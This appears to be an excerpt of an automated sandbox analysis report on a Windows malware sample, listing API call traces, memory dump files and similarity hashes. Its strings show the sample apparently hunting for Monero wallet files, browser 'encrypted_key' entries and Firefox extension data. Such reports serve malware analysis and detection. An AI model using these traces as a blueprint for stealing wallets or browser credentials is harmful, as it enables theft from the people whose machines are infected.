                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC7E3E
                  • RegOpenKeyExA.ADVAPI32(80000002,00C7C010,00000000,00020119,?), ref: 00FC7E5E
                  • RegQueryValueExA.ADVAPI32(?,00C8DC00,00000000,00000000,000000FF,000000FF), ref: 00FC7E7F
                  • RegCloseKey.ADVAPI32(?), ref: 00FC7E92
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 00e2401850bc0e8040b3d468d97a50b1ee6d93b4fe506bfa3eb9ee0c1e250efe
                  • Instruction ID: 9b4c309deb7cde7a862176b624cd069f7200f2a458e0296b3ed85c8889163707
                  • Opcode Fuzzy Hash: 00e2401850bc0e8040b3d468d97a50b1ee6d93b4fe506bfa3eb9ee0c1e250efe
                  • Instruction Fuzzy Hash: 251191B2A44205EBD714DF94E94AF7FBBB8EB44711F10422DF61AA7284D77858009FA0
                  APIs
                  • StrStrA.SHLWAPI(00C8E0B0,?,?,?,00FC140C,?,00C8E0B0,00000000), ref: 00FC926C
                  • lstrcpyn.KERNEL32(011FAB88,00C8E0B0,00C8E0B0,?,00FC140C,?,00C8E0B0), ref: 00FC9290
                  • lstrlen.KERNEL32(?,?,00FC140C,?,00C8E0B0), ref: 00FC92A7
                  • wsprintfA.USER32 ref: 00FC92C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpynlstrlenwsprintf
                  • String ID: %s%s
                  • API String ID: 1206339513-3252725368
                  • Opcode ID: 1f2d713b0105dea11d874a2b9abbde0cbbde1ce96a7a26cb27052cefe3a54edc
                  • Instruction ID: 22ce5e7699ce556979e955153785c421e72d44140cc0869293c44fd52a201396
                  • Opcode Fuzzy Hash: 1f2d713b0105dea11d874a2b9abbde0cbbde1ce96a7a26cb27052cefe3a54edc
                  • Instruction Fuzzy Hash: D401E975500108FFCB08DFE8D988EAE7BB9EF44350F10854CF90D97204C675AA41DB90
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB12B4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FB12BB
                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00FB12D7
                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00FB12F5
                  • RegCloseKey.ADVAPI32(?), ref: 00FB12FF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 9ebac140fa1e4e1b5d9a7617492cb2ab80855aebfd3d8c1521332f8dda39bcc8
                  • Instruction ID: 5f1f182d3099c857601fbd94634889fa4a076a77d579c8c53897f02e0a68323b
                  • Opcode Fuzzy Hash: 9ebac140fa1e4e1b5d9a7617492cb2ab80855aebfd3d8c1521332f8dda39bcc8
                  • Instruction Fuzzy Hash: 3A0136B9A40208BFDB14DFD0E849FAEB7B8EF48701F008159FA1997284D675AA418F50
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: String___crt$Type
                  • String ID:
                  • API String ID: 2109742289-3916222277
                  • Opcode ID: f646b16dc95dd8bf46fe2c20081a78eb61871284264bc237f77b068c08309af9
                  • Instruction ID: f843f8a101bf6f881f9a5d989943a09fd95182f8f7b11bc02ccf8a657418835f
                  • Opcode Fuzzy Hash: f646b16dc95dd8bf46fe2c20081a78eb61871284264bc237f77b068c08309af9
                  • Instruction Fuzzy Hash: 7D41F6B150079D5EDB218B24CE86FFB7BF89F45704F1444ECE98E86182D2719A45EFA0
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00FC6663
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00FC6726
                  • ExitProcess.KERNEL32 ref: 00FC6755
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                  • String ID: <
                  • API String ID: 1148417306-4251816714
                  • Opcode ID: e750acf5ad003f382054451ae9ebdbcdc71b811f41550c9f67278f567ddafef0
                  • Instruction ID: 42cba3e3a9a002c234a48443144b782b92c4bcde464dff908591c50b4ec652ce
                  • Opcode Fuzzy Hash: e750acf5ad003f382054451ae9ebdbcdc71b811f41550c9f67278f567ddafef0
                  • Instruction Fuzzy Hash: 9D3127B1801219ABDB18EB90DD96FDEB778AF04304F40419CF21A67191DF787A89CF69
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00FD0E28,00000000,?), ref: 00FC882F
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC8836
                  • wsprintfA.USER32 ref: 00FC8850
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                  • String ID: %dx%d
                  • API String ID: 1695172769-2206825331
                  • Opcode ID: 97559932c1d29ec085668a0e25b11f96bca4606a026eb8f366b15e7e2e809f76
                  • Instruction ID: d6ffc9b9fc95058f3404cfa4c31e5175fee011c06f0c84c597251cff14cdf1dd
                  • Opcode Fuzzy Hash: 97559932c1d29ec085668a0e25b11f96bca4606a026eb8f366b15e7e2e809f76
                  • Instruction Fuzzy Hash: 602145B1A40204AFDB14DF94ED45FAEBBB8FF48711F10411DF519A7284C7799941CBA1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00FC951E,00000000), ref: 00FC8D5B
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC8D62
                  • wsprintfW.USER32 ref: 00FC8D78
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesswsprintf
                  • String ID: %hs
                  • API String ID: 769748085-2783943728
                  • Opcode ID: ebde4c9f95ee8d98aa174a1a2a44471ae383abf8dbd0c3c03eb0d5d2dc883173
                  • Instruction ID: 90b577a719f1b63bf012ab3574f7b16841afbf3b806d09f3860d7c71333e553d
                  • Opcode Fuzzy Hash: ebde4c9f95ee8d98aa174a1a2a44471ae383abf8dbd0c3c03eb0d5d2dc883173
                  • Instruction Fuzzy Hash: A1E08CB1A40208BFC724DB94E80AE6977B8EF44702F0001A8FD0E87280DAB59E409B91
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                    • Part of subcall function 00FC8B60: GetSystemTime.KERNEL32(00FD0E1A,00C8A450,00FD05AE,?,?,00FB13F9,?,0000001A,00FD0E1A,00000000,?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FC8B86
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FBA2E1
                  • lstrlen.KERNEL32(00000000,00000000), ref: 00FBA3FF
                  • lstrlen.KERNEL32(00000000), ref: 00FBA6BC
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                  • DeleteFileA.KERNEL32(00000000), ref: 00FBA743
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 1447707e4242ea490068081806018d61168f43a41ecb67475d3c93d6d00ddcd3
                  • Instruction ID: 21ca0e65dff4f0f7aaf1427637991e22807d002674151c3fc9586a6d8cff4e6c
                  • Opcode Fuzzy Hash: 1447707e4242ea490068081806018d61168f43a41ecb67475d3c93d6d00ddcd3
                  • Instruction Fuzzy Hash: EAE1DB7281010D9BDB18EBA4DE93FEE7338AF54304F50816DF51672091EE387A49EB66
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                    • Part of subcall function 00FC8B60: GetSystemTime.KERNEL32(00FD0E1A,00C8A450,00FD05AE,?,?,00FB13F9,?,0000001A,00FD0E1A,00000000,?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FC8B86
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FBD481
                  • lstrlen.KERNEL32(00000000), ref: 00FBD698
                  • lstrlen.KERNEL32(00000000), ref: 00FBD6AC
                  • DeleteFileA.KERNEL32(00000000), ref: 00FBD72B
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: a75bfe8e350782005c121ae9a14b5029058e4fae62073dcbe7bdebca387d1896
                  • Instruction ID: 7e873073a0e6edc34a273b52b12469a10ce51a73c8f5adaa84402bd04da29c83
                  • Opcode Fuzzy Hash: a75bfe8e350782005c121ae9a14b5029058e4fae62073dcbe7bdebca387d1896
                  • Instruction Fuzzy Hash: 67910C7281010D9BDB18EBA0DE97FEE7338AF54304F50416DF516A6091EF387A49EB62
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                    • Part of subcall function 00FC8B60: GetSystemTime.KERNEL32(00FD0E1A,00C8A450,00FD05AE,?,?,00FB13F9,?,0000001A,00FD0E1A,00000000,?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FC8B86
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FBD801
                  • lstrlen.KERNEL32(00000000), ref: 00FBD99F
                  • lstrlen.KERNEL32(00000000), ref: 00FBD9B3
                  • DeleteFileA.KERNEL32(00000000), ref: 00FBDA32
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 9b1df329743b4e179e564fb43d0c3fe5453dc7120fbb76d7c4b26955cb8d63fe
                  • Instruction ID: d5d09f1522e42409ef83b769e177af14e2bb0e62b68ae190203567afebf6f8df
                  • Opcode Fuzzy Hash: 9b1df329743b4e179e564fb43d0c3fe5453dc7120fbb76d7c4b26955cb8d63fe
                  • Instruction Fuzzy Hash: D181FB7291010D9BDB18EBA0DE97FEE7338AF54304F50412DF416A60D1EE387A49EB62
                  APIs
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                    • Part of subcall function 00FB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB99EC
                    • Part of subcall function 00FB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FB9A11
                    • Part of subcall function 00FB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FB9A31
                    • Part of subcall function 00FB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FB148F,00000000), ref: 00FB9A5A
                    • Part of subcall function 00FB99C0: LocalFree.KERNEL32(00FB148F), ref: 00FB9A90
                    • Part of subcall function 00FB99C0: CloseHandle.KERNEL32(000000FF), ref: 00FB9A9A
                    • Part of subcall function 00FC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FC8E52
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00FD1580,00FD0D92), ref: 00FBF54C
                  • lstrlen.KERNEL32(00000000), ref: 00FBF56B
                  Strings
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                  • String ID: ^userContextId=4294967295$moz-extension+++
                  • API String ID: 998311485-3310892237
                  • Opcode ID: 0c390623aa0613bfee079ee516af0e9bd22816d76d49bfb401b0fc5b306792d3
                  • Instruction ID: ccf0fbabeaa53f18e2c0c0134953871201edf12fee75785910061f7ad67edfbe
                  • Opcode Fuzzy Hash: 0c390623aa0613bfee079ee516af0e9bd22816d76d49bfb401b0fc5b306792d3
                  • Instruction Fuzzy Hash: 32511C71D0010DABDB04FBA0ED97EED7339AF54304F40852CE816661D1EE387A09EBA2
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen
                  • String ID:
                  • API String ID: 367037083-0
                  • Opcode ID: 39f3bdf59209a6d5bd01ddd9e6862b0a08cb8250903e8f8a2c8967ea8e50072a
                  • Instruction ID: 330f0f1b3559a7c4fcdd36fc2b1e7ee363f55b3edc82b6e1fd6252a01c4ae368
                  • Opcode Fuzzy Hash: 39f3bdf59209a6d5bd01ddd9e6862b0a08cb8250903e8f8a2c8967ea8e50072a
                  • Instruction Fuzzy Hash: 75413D71D1010AABCB04EFA4DA46FEEB775EF44704F14801CE41667280EB79AA05EFA2
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB99EC
                    • Part of subcall function 00FB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FB9A11
                    • Part of subcall function 00FB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FB9A31
                    • Part of subcall function 00FB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FB148F,00000000), ref: 00FB9A5A
                    • Part of subcall function 00FB99C0: LocalFree.KERNEL32(00FB148F), ref: 00FB9A90
                    • Part of subcall function 00FB99C0: CloseHandle.KERNEL32(000000FF), ref: 00FB9A9A
                    • Part of subcall function 00FC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FC8E52
                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00FB9D39
